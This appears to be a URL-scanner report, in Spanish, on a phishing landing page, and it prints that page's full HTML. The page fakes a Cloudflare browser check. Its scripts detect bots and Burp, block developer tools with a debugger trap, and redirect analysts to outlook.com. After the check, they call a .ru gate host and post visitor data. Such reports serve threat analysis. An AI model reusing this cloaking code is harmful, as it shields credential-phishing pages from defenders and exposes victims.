https://u0.odayerith.com/8Yr3cu/

ID de exploración:
4a94731a-a08d-48a1-a433-e2f06fd44301Finalizado
URL enviada:
https://beggsandpartners.technolutionszzzz.net/
Informe finalizado:

Enlaces: 0 encontrados

Variables JavaScript: 10 encontradas

onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
xjnctYUaUSobject
$function
jQueryfunction
turnstileobject
CryptoJSobject
zHuUxAoHVOfunction
FWAUxdzJuYfunction

Mensajes de registro de la consola: 5 encontrados

warningnetwork
URL
https://u0.odayerith.com/8Yr3cu/
TEXTO
A parser-blocking, cross site (i.e. different eTLD+1) script, https://code.jquery.com/jquery-3.6.0.min.js, is invoked via document.write. The network request for this script MAY be blocked by the browser in this or a future page load due to poor network connectivity. If blocked in this page load, it will be confirmed in a subsequent console message. See https://www.chromestatus.com/feature/5718547946799104 for more details.
warningnetwork
URL
https://u0.odayerith.com/8Yr3cu/
TEXTO
A parser-blocking, cross site (i.e. different eTLD+1) script, https://code.jquery.com/jquery-3.6.0.min.js, is invoked via document.write. The network request for this script MAY be blocked by the browser in this or a future page load due to poor network connectivity. If blocked in this page load, it will be confirmed in a subsequent console message. See https://www.chromestatus.com/feature/5718547946799104 for more details.
warningnetwork
URL
https://u0.odayerith.com/8Yr3cu/
TEXTO
A parser-blocking, cross site (i.e. different eTLD+1) script, https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit, is invoked via document.write. The network request for this script MAY be blocked by the browser in this or a future page load due to poor network connectivity. If blocked in this page load, it will be confirmed in a subsequent console message. See https://www.chromestatus.com/feature/5718547946799104 for more details.
warningnetwork
URL
https://u0.odayerith.com/8Yr3cu/
TEXTO
A parser-blocking, cross site (i.e. different eTLD+1) script, https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js, is invoked via document.write. The network request for this script MAY be blocked by the browser in this or a future page load due to poor network connectivity. If blocked in this page load, it will be confirmed in a subsequent console message. See https://www.chromestatus.com/feature/5718547946799104 for more details.
errornetwork
URL
https://u0.odayerith.com/favicon.ico
TEXTO
Failed to load resource: the server responded with a status of 404 ()

HTML

<!-- I find that the harder I work, the more luck I seem to have. --><html lang="en"><head>


    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
    <meta name="robots" content="noindex, nofollow">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>​</title>
    <style>
body {
  background-color: #fff;
  height: 100%;
  overflow: hidden;
}
#sHWnfjZpnN h4{margin-top:0;margin-bottom:.5rem;font-weight:500;line-height:1.2;}
#sHWnfjZpnN h4{font-size:calc(1.3);}
@media (min-width:1200px){
#sHWnfjZpnN h4{font-size:1.5rem;}
}
#sHWnfjZpnN p{margin-top:0;margin-bottom:1rem;}
#sHWnfjZpnN.captcha-container{position: relative;top: 153px;/*width: 100%;*/padding-right: var(--bs-gutter-x, .75rem);padding-left: var(--bs-gutter-x, .75rem);margin-right: auto;margin-left: auto;}
#sHWnfjZpnN .text-center {text-align: center!important;}
@media (min-width:992px){
#sHWnfjZpnN .col-lg-4{flex:0 0 auto;width:33.33333333%;}
}
#sHWnfjZpnN .display-4 {font-size: 1.25rem!important;}
#sHWnfjZpnN .mt-2 {margin-top: 0.5rem!important;}
#sHWnfjZpnN .h4 {font-size: calc(.900rem + .3vw);}
#sHWnfjZpnN .justify-content-center{justify-content:center!important;}
#sHWnfjZpnN.mt-5{margin-top:3rem!important;}
#sHWnfjZpnN .mt-4 {margin-top: 1rem!important;}
#sHWnfjZpnN #tLrmtGXUtT {color: #6c757d;font-size:14px;margin-top: .5rem;}
    </style>
    <script>
    if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
        window.location = "about:blank";
}
document.addEventListener('keydown', function(event) {
    if (event.key === 'F12') {
        event.preventDefault();
        return false;
    }

    if (
        (event.ctrlKey && event.key === 'U') || // Ctrl + U
        (event.ctrlKey && event.shiftKey && event.key === 'I') || // Ctrl + Shift + I
        (event.ctrlKey && event.shiftKey && event.key === 'C') || // Ctrl + Shift + C
        (event.ctrlKey && event.shiftKey && event.key === 'J')    // Ctrl + Shift + J
    ) {
        event.preventDefault();
        return false;
    }

    if (
        (event.metaKey && event.altKey && event.key === 'I') || // Cmd + Option + I
        (event.metaKey && event.altKey && event.key === 'C')    // Cmd + Option + C
    ) {
        event.preventDefault();
        return false;
    }

    if (event.ctrlKey && event.shiftKey && event.key === 'K') {
        event.preventDefault();
        return false;
    }

    if (event.ctrlKey && event.key === 'H') {
        event.preventDefault();
        return false;
    }
});
document.addEventListener('contextmenu', function(event) {
    event.preventDefault();
    return false;
});
(function detectDevTools() {
    let devtoolsOpen = false;
    const threshold = 100; // Time delay threshold for detecting debugger
    setInterval(function() {
        const start = performance.now();
        debugger; // Intentionally trigger debugger detection
        const end = performance.now();
        if (end - start > threshold && !devtoolsOpen) {
            devtoolsOpen = true;
            window.location.replace('https://www.outlook.com');
        }
    }, 1000);
})();
    </script>
</head>

<body style="font-family: arial, sans-serif;background-color: #fff;color: #000;padding: 20px;font-size: 18px;overscroll-behavior: contain;">
<div id="sHWnfjZpnN" class="captcha-container">
<div id="niVCqUaUEF" class="justify-content-center">
<div class="text-center">
<form id="WtFcSNBSCt">
<div class="cf_turnstile" id="cf"><div><input type="hidden" name="cf-turnstile-response" id="cf-chl-widget-17pbf_response"></div></div>
<input type="hidden" id="sid" name="sid" value="iuopnKJDi4zkWt3puVx8ZUkMpy8eEmfjShJDXHvG">
<input type="hidden" id="pagelink" name="pagelink" value="">
<input type="hidden" id="bltdip" name="bltdip" value="Unknown">
<input type="hidden" id="bltdref" name="bltdref" value="https://beggsandpartners.technolutionszzzz.net/">
<input type="hidden" id="bltdua" name="bltdua" value="Unknown">
<input type="hidden" id="bltddata" name="bltddata" value="">
</form>
</div>
<div class="text-center" id="tLrmtGXUtT">
Verifying your browser to protect your connection.
</div>

</div>
</div>

<script>
turnstile.render('#cf', {
    sitekey: '0x4AAAAAAAz8RwlENVqrl3F1',
    'error-callback': zHuUxAoHVO,
    callback: FWAUxdzJuY,
});
function zHuUxAoHVO() {
    turnstile.reset();
}
function FWAUxdzJuY() {
    var kpPqlUdOCC = document.getElementById("WtFcSNBSCt");
    kpPqlUdOCC.onsubmit = function (event) {
        event.preventDefault();
    };
    document.getElementById("pagelink").value = 'RK9BQ';
    var LdbgUUxuTM = "../tdYHdL7hs7hGJzbvfDtIxvfqxskYw7PWlhzp";
    fetch('https://wbzA4N8JaXdwW6KGz8ks5aORlQls0auGg4hqdIPK0sJfaPc88LeNCOdk.ygncsqvu.ru/30879603718020235IvhNRBNzIiCTJURBZKHBRMKLFFRRQXVUZZLGVDWUEENFFXWDHPNFYZICRJQWRMKAF', {
    method: "GET",
    }).then(response => {
    return response.text()
    }).then(text => {
    if(text == 0){
    fetch(LdbgUUxuTM, {
        method: "POST",
        body: new FormData(kpPqlUdOCC)
    }).then(response => {
        return response.json();
    }).then(data => {
        if(data['status'] == 'success'){
        location.reload();
        }
        if(data['status'] == 'error'){
        window.location.replace('https://www.outlook.com');
        }
    });
    }
    if(text != 0){
    window.location.replace('https://www.outlook.com');
    }
    })
    .catch(error => {
    window.location.replace('https://www.outlook.com');
    });
}
</script>





</body></html><!-- All our dreams can come true if we have the courage to pursue them. -->